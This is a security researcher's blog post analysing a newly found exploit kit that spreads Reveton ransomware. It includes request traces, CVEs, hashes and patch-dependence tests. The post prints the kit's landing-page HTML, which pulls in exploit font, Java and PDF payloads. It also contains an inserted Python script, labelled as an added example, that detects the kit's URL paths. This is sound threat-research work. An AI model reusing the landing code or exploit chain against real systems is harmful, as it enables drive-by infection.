Stats page title |
Sorry for the "read it live" post...the situation was moving while writing.
A few days ago I discovered that a bunch of reverse proxies that I was linking to the same Blackhole Exploit Kit were in fact linked to 2 different Blackholes (quite surely operated by the same team - I saw reverse proxies being redirected from one server to another one).
Trying to build a signature to know which server was behind a specific reverse, I found a new exploit kit.
Empty default stats |
I quickly noticed a few things.
/r/pricelist.php is a PDF exploit.
/r/myadv.php is a Java pack.
/font.php is a Reveton PE.
I thought it would take weeks before it went wild... but yesterday Malekal caught a landing spreading Reveton (blood.falawllp.info /r/l/town-proved.php ) and I immediately recognized that new EK. So I hunted the malvertising and found another domain but the same landing, pointing to an already known Reverse Proxy.
Seems like it was time to take a deep look at this EK.
Small improvement, it looks like the "Sploit pack" is being checked by tools like Scan4you.
When I first checked it, the payload was not being pushed (all night long: no payload).
CVE-2012-4681 - IE - WinXP 32b
try.addsdice.com /r/l/town-proved.php <-- try.addsdice.com full of meaning no ?
try.addsdice.com /r/32size_font.eot <- ?
try.addsdice.com /r/pricelist.php
try.addsdice.com /r/myadv.php.pack.gz <- ?
try.addsdice.com /r/myadv.php
try.addsdice.com /r/myadv.php
try.addsdice.com /r/l//r/f.php?k=1 <-- Vuln tracer for owner (seems guest does not have access to vuln break %)
CVE-2012-4681 - Firefox - WinXP 32b
try.addsdice.com /r/l/town-proved.php
try.addsdice.com /r/pricelist.php
try.addsdice.com /r/l//r/f.php?k=1
21x.xx.11x.1xx /r/l/town-proved.php
21x.xx.11x.1xx /r/64size_font.eot <- ?
21x.xx.11x.1xx /r/pricelist.php
21x.xx.11x.1xx /r/myadv.php
21x.xx.11x.1xx /r/myadv.php
21x.xx.11x.1xx /r/l//r/f.php?k=2
CVE-2012-1723 - IE - Win7 64b
21x.xx.11x.1xx /r/l/town-proved.php
21x.xx.11x.1xx /r/64size_font.eot <- ?
21x.xx.11x.1xx /r/pricelist.php
21x.xx.11x.1xx /favicon.ico
21x.xx.11x.1xx /r/myadv.php
21x.xx.11x.1xx /r/f.php?k=4
MDAC (you should not be hurt):
21x.xx.11x.1xx /r/l/town-proved.php
21x.xx.11x.1xx /r/32size_font.eot
21x.xx.11x.1xx /r/pricelist.php
Not up to date Win7 64b - IE - (j7u7)
Note that there is NO payload on the EK right now. I don't know how to be 100% sure the CVE is indeed active and that it's this CVE which is being used, or a new thing...
try.addsdice.com /r/l/town-proved.php
try.addsdice.com /r/64size_font.eot
try.addsdice.com /r/pricelist.php
try.addsdice.com /favicon.ico
try.addsdice.com /r/f.php?k=4 <- ?
try.addsdice.com /r/myadv.php
try.addsdice.com /r/myadv.php
try.addsdice.com /r/myadv.php
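The request chains listed above can be turned into a proxy-log check. The following is an added example, not code from the original post: it groups requests per client and host and flags sessions that fetch a landing plus at least two other Cool EK stages. The three-field log format, the host names and the generalisation of the landing to any /r/l/*.php file are assumptions.

```python
import re
from collections import defaultdict

# Path patterns taken from the traces above. The landing pattern generalises
# "town-proved.php" to any file name under /r/l/ (assumption).
STAGES = {
    "landing": re.compile(r"^/r/l/[\w-]+\.php$"),
    "font": re.compile(r"^/r/(32|64)size_font\.eot$"),
    "pdf": re.compile(r"^/r/pricelist\.php$"),
    "jar": re.compile(r"^/r/myadv\.php(\.pack\.gz)?$"),
    "tracer": re.compile(r"^(/r/l/)?/r/f\.php$"),  # seen as /r/f.php and /r/l//r/f.php
}

# Constructed sample log: "client host request-target" (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 ek.example /r/l/town-proved.php
10.0.0.5 ek.example /r/64size_font.eot
10.0.0.5 ek.example /r/pricelist.php
10.0.0.5 ek.example /favicon.ico
10.0.0.5 ek.example /r/myadv.php
10.0.0.5 ek.example /r/f.php?k=4
10.0.0.9 shop.example /r/pricelist.php
10.0.0.9 shop.example /index.php
10.0.0.7 ek.example /r/l/town-proved.php
10.0.0.7 ek.example /r/32size_font.eot
10.0.0.7 ek.example /r/pricelist.php
"""

def classify(target):
    """Return the stage name for a request target, or None if nothing matches."""
    path = target.partition("?")[0]  # drop the query string (e.g. ?k=4)
    for name, pattern in STAGES.items():
        if pattern.match(path):
            return name
    return None

def flag_sessions(log_text, extra_stages=2):
    """Map (client, host) -> sorted stages for sessions with a landing
    and at least `extra_stages` other distinct stages."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue  # skip malformed lines
        client, host, target = parts
        stage = classify(target)
        if stage:
            seen[(client, host)].add(stage)
    return {key: sorted(stages) for key, stages in seen.items()
            if "landing" in stages and len(stages) - 1 >= extra_stages}

if __name__ == "__main__":
    for (client, host), stages in flag_sessions(SAMPLE_LOG).items():
        print(client, host, ",".join(stages))
```

A single matching path, such as a lone /r/pricelist.php on an unrelated site, is not flagged; the sequence of stages on one host is what identifies the kit.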
town-proved.php with IE contains :
<style>@font-face{font-family:'p1';src:url('http://BEEPBEEP/64size_font.eot');}.duqu{font-size:5px;line-height:normal;font-family:'p1';position:absolute;top:0px;left:0px;}</style></head><body onload='try{window.focus();}catch(e){}'><div class='duqu'>:)</div><applet archive='http://BEEPBEEP/myadv.php' code='ja.jh' width='468' height='200'></applet><br><br><iframe src='http://BEEPBEEP/pricelist.php' width='468' height='468'></iframe></body></html>
Source code of the landing pushed to IE on x64 windows |
.duqu <- ouch, exactly what we could expect from a font drop!
Cool EK Tree |
file.dll is a Reveton.
myadv.php (jar) - at least CVE-2012-4681, CVE-2012-507, CVE-2012-1723
CVE-2012-4681 spotted in jar file from Cool EK |
filelist.php (pdf) - CVE-2010-0188
3bffc22ce0e67144c1b10da968f32f4c (2012-10-03) - http://wepawet.iseclab.org/view.php?hash=3bffc22ce0e67144c1b10da968f32f4c&t=1349739053&type=js
32size_font.eot : 050fbef5c814b2981fa61b7fc6820cbd
64size_font.eot : fada0b184b5372863a0c51f7fef5e2d0
How good is the "breaking" percentage ?
Guest stats on 1 thread (we can estimate that it's Reveton Infection via one Traffer) |
Stats are moving and I can't get infected by that thread. Looks like they are testing the EK in Traffic Analyser mode.
[EDIT - While Writing this post]
Around 10am French time got infected. As expected : Reveton.
So the Exploit Kit moved to production mode again.
Tried to run the landing on a CVE-2011-3402 positive computer with Java 7u7: got infected (but it's not Java).
Payload: f15df53d8cca428d2dbe924fe1dff733
Reveton for those who do not know (look botnets.fr/index.php/Reveton) |
Ran it on a fully patched IE 8/Windows on Win 64 and Java 7u7: no infection.
Tried to run the landing on a "Not up to date Win7 x64" positive computer without Java: got infected.
Payload : 106f1f7e3a24d1ae9af0efc0934a4dcb
Call Home from that Reveton payload. |
Around 10:30 am : Malekal just found a new domain matching a known Reverse proxy that just switched from one BH EK server to this BH + Cool EK server.
I do not know what this font is about.
Is this a "new (?)" enabler for CVE-2012-4969? Is this another patched vuln from Internet Explorer?
Am getting help to sort this out. Will update this post.
<edit1> got answer by Kaspersky Labs : it's CVE-2011-3402
so I s/CVE-2012-4969/CVE-2011-3402 this post...yes not ethical ;)
On my MDAC VM :
KB2676562 fixes CVE-2011-3402 |
</edit1>
<edit2>
After fighting for hours with Updates and this EK (that was not Cool, trust me) I came to the conclusion that it's not only CVE-2011-3402, and that maybe explains the "not so good" percentage of break.
It seems that if you have at least one of these components installed, you are not vuln to the "Duqu-like" font drop:
-KB2676562 - CVE-2011-3402
-KB2744842 - CVE-2012-4969
-KB2718523 - CVE-2012-1893/CVE-2012-1890
-Windows Explorer 9.0
Downgrading a Windows 7 x64 to see the required "missing" KB to get owned. "-" means I removed this patch. |
</edit2>